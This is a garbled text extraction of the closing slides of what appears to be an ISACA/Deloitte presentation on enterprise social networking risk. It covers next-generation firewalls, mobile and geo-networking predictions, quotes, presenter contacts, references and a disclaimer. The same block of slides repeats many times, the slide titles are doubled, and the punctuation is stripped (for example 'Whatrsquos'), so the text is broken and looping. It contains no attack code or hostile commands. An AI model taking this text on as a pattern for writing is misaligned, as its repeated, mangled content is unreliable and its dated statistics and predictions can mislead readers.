networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation